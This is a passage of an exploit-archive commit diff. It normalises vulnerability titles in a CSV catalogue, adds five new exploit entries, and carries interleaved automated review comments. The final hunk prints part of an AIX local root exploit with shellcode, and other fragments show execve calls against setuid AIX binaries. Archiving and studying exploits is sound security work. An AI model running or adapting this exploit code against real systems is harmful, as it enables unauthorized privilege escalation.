DB: 2016-03-17

5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities

AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
Offensive Security 2016-03-17 07:07:56 +00:00
parent 48534c54b0
commit 477bcbdcc0
7877 changed files with 590387 additions and 589604 deletions

View file

@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port
3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0
3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0
3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0
3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0
3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0
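Review bot: the new description for 3671 drops the word "Exploit" even though the entry is a working script (3671.php) rather than a text advisory; if titles are relied on to tell exploit code from write-ups, consider keeping a marker such as "Multiple Vulnerabilities (Exploit)", or confirm that the file extension in the second column is the intended signal.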
@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port
10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0
10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0
10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0
10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
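Review bot: while titles in this region are being normalised, the context line for 10789 still reads "Joomla compnent com_noticia Cross-Site scripting"; "compnent" is a typo and the capitalisation differs from the neighbouring rows, so it is worth fixing in the same pass, e.g. "Joomla Component com_noticia - Cross-Site Scripting".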
@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port
11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0
11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
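Review bot: context line 11450 ("File Upload Manager 1.3") carries no vulnerability class at all, which makes it the weakest title in this hunk; since this commit is a title-normalisation pass, check 11450.txt and append the class the write-up describes.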
@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port
11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0
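Review bot: the 11894 rename only fixes pluralisation; the title is still the archive filename "cmsfaethon-2.2.0-ultimate.7z" rather than a product name and version, so it will not sort or search alongside the other CMS rows. If the advisory text names the product, derive the title from that instead.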
@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port
12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0
12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port
12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0
12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0
15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0
12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0
12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0
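Review bot: context line 15732 (dated 2010-12-14) sits between 12240 and 12241, breaking the id ordering the rest of the file follows; since this hunk already edits the adjacent row, consider moving 15732 to its numeric position in the same change.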
@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port
12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0
12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port
12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0
12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0
@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
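Review bot: 14322 is inserted between 12691 and 12692, out of id order, and the unchanged context line for 12694 ("Tochin Ecommerce Multiple Remote Vulnerability") has exactly the singular "Multiple ... Vulnerability" pattern this commit is normalising yet is left untouched; a scripted pass over the whole CSV would catch both.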
@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port
12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0
12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0
12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0
12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port
14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0
14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0
14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0
14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0
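Review bot: context line 14281 contains the typo "Vulnerabilty"; it is three rows above the entry being renamed and should be corrected in the same title-cleanup pass.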
@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port
14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0
14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0
14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0
@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port
17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0
17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0
17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0
17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0
17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0
17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0
@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port
24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0
24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
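Review bot: 24531 appears before 24526-24528 in this hunk, so the rename preserves an out-of-order row; moving it to its numeric position is a small, in-scope fix while this region is already being edited.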
@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port
30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0
30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
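Review bot: context line 30237 ("Cisco Unified Communications Manager - TFTP Service") names a component but no vulnerability class, unlike the renamed 30235 row next to it; check 30237.sh and add the class it demonstrates so the title follows the convention this commit is enforcing.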
@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
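Review bot: the 34606 change goes beyond the other hunks: it adds a version number ("2.4") to the title, which is a factual addition rather than a pluralisation fix. Confirm the version against 34606.txt so the CSV does not assert a version the advisory itself does not state.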
@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port
35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port
39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
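Review bot: the five new rows use the type and port columns inconsistently: 39564 is an OS command injection reachable on port 443 but typed "webapps", while 39568 and 39569, also network-reachable, are typed "remote". If "webapps" is intended for HTTP-delivered cases regardless of impact, a short convention note in the repository would help contributors classify future entries the same way.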

View file

@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/netpmon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
}
// milw0rm.com [2005-06-14]
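Review bot: both lines in this hunk ("}" and "// milw0rm.com [2005-06-14]") are removed and re-added with identical text, so the change is whitespace or line-ending only; with 7877 files touched this way, the title fixes in files.csv are buried under noise. Normalising line endings in a separate commit (or via .gitattributes) would keep the two kinds of change independently reviewable.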

View file

@ -95,6 +95,6 @@ int main()
execve( "/usr/sbin/ipl_varyon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
}
// milw0rm.com [2005-06-14]

View file

@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/paginit", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
}
// milw0rm.com [2005-06-14]

View file

@ -155,6 +155,6 @@ L=`expr $L + 144`
./a.out $L
done
/str0ke
*/
// milw0rm.com [1997-05-27]
*/
// milw0rm.com [1997-05-27]
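Review bot: the closing "*/" and the milw0rm footer are re-emitted unchanged, so this hunk is also a line-ending-only rewrite; nothing in the exploit text changed, and the hunk can be skipped when reviewing for content.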

View file

@ -156,6 +156,6 @@ do
echo $L
L=`expr $L + 42`
./a.out $L
done */
// milw0rm.com [1997-05-26]
done */
// milw0rm.com [1997-05-26]

View file

@ -1,178 +1,178 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX capture Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
